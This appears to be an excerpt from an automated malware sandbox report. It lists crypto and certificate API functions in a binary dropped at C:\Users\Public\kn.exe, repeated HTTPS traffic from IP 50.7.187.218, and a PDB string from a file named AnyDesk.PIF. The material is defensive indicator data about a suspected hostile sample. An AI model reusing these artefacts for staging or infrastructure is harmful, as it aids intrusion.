      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C550B80 NCryptCreatePersistedKey,#205,#359,#359,#357,6_2_00007FF67C550B80
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4DCB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,6_2_00007FF67C4DCB98
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5BEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,6_2_00007FF67C5BEB38
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C586C30 NCryptOpenStorageProvider,#360,6_2_00007FF67C586C30
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4ECC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_00007FF67C4ECC24
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C580BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,6_2_00007FF67C580BF4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C552BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C552BC0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C544CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C544CA0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C55ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,6_2_00007FF67C55ACAC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C594C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,6_2_00007FF67C594C80
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C552C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,6_2_00007FF67C552C80
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C586C88 NCryptEnumAlgorithms,#360,6_2_00007FF67C586C88
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C588C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF67C588C58
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4B6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF67C4B6C4C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C550C3C NCryptExportKey,#205,#359,#359,#357,6_2_00007FF67C550C3C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C512D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C512D18
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C586D2C NCryptFreeBuffer,#360,6_2_00007FF67C586D2C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C542CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,6_2_00007FF67C542CF8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C552CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,6_2_00007FF67C552CFC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C550D14 NCryptFinalizeKey,#205,#357,#357,6_2_00007FF67C550D14
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C586CE0 NCryptEnumStorageProviders,#360,6_2_00007FF67C586CE0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5A8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,6_2_00007FF67C5A8CF4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C514CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,6_2_00007FF67C514CC0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5565B4 NCryptIsKeyHandle,_CxxThrowException,6_2_00007FF67C5565B4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C54E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,6_2_00007FF67C54E57C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C58A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF67C58A590
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5BA58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,6_2_00007FF67C5BA58C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4D8600 #357,CryptDecodeObject,GetLastError,LocalFree,6_2_00007FF67C4D8600
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4E0630
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4DC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF67C4DC5D4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5125E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF67C5125E8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,6_2_00007FF67C4E6694
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C524694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,6_2_00007FF67C524694
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C586654 NCryptGetProperty,#360,6_2_00007FF67C586654
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C51A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,6_2_00007FF67C51A654
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C542724 CryptDecodeObject,GetLastError,#357,6_2_00007FF67C542724
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5866D8 NCryptFreeObject,#360,6_2_00007FF67C5866D8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5786D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,6_2_00007FF67C5786D8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4F26E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,6_2_00007FF67C4F26E0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5507A4 BCryptDestroyHash,#205,#357,6_2_00007FF67C5507A4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C58A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C58A740
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C550740 BCryptCloseAlgorithmProvider,#205,#357,#357,6_2_00007FF67C550740
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4D6824 CryptHashCertificate,GetLastError,#357,6_2_00007FF67C4D6824
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C588814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,6_2_00007FF67C588814
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4B67CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4B67CC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C53C7F0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5507F4 BCryptDestroyKey,#205,#357,6_2_00007FF67C5507F4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5427BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C5427BC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5607D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C5607D0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5BE8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,6_2_00007FF67C5BE8B0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C550844 BCryptExportKey,#205,#359,#357,#357,6_2_00007FF67C550844
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C584914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C584914
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,6_2_00007FF67C53E914
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4CA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,6_2_00007FF67C4CA8CC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5508EC BCryptGetProperty,#205,#359,#357,#357,6_2_00007FF67C5508EC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5761AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,6_2_00007FF67C5761AC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C51417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF67C51417C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4F21A4 #360,#359,#357,#357,BCryptFreeBuffer,6_2_00007FF67C4F21A4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C536194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C536194
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B613C CryptDecodeObjectEx,6_2_00007FF67C5B613C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C54E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF67C54E1F8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C58A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,6_2_00007FF67C58A1F8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B6214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,6_2_00007FF67C5B6214
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,6_2_00007FF67C53A1E8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C588298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,6_2_00007FF67C588298
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C572278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,6_2_00007FF67C572278
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C526280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C526280
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C57E274
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4F0300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,6_2_00007FF67C4F0300
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5BA2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,6_2_00007FF67C5BA2E0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4DE3B0 #357,#357,CryptDecodeObject,LocalFree,6_2_00007FF67C4DE3B0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C542358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,6_2_00007FF67C542358
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C546374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,6_2_00007FF67C546374
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4D4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4D4410
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C588404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF67C588404
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4F23E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,6_2_00007FF67C4F23E8
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C548488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,6_2_00007FF67C548488
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C52C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,6_2_00007FF67C52C450
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C52A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,6_2_00007FF67C52A450
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4DC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,6_2_00007FF67C4DC514
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C57E516
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4C44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4C44E0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5224D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,6_2_00007FF67C5224D4
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49752 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49755 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49759 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49761 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49763 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49765 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49771 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49773 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49775 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49777 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49781 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49783 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49785 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49789 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49796 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49803 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49810 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49824 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49831 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49838 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49845 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49852 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49859 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49866 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49870 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49876 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49881 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49887 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49894 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49900 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49907 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49914 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49921 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49928 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49935 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49942 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49949 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49955 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49962 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49969 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49976 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49983 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49990 version: TLS 1.2
      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
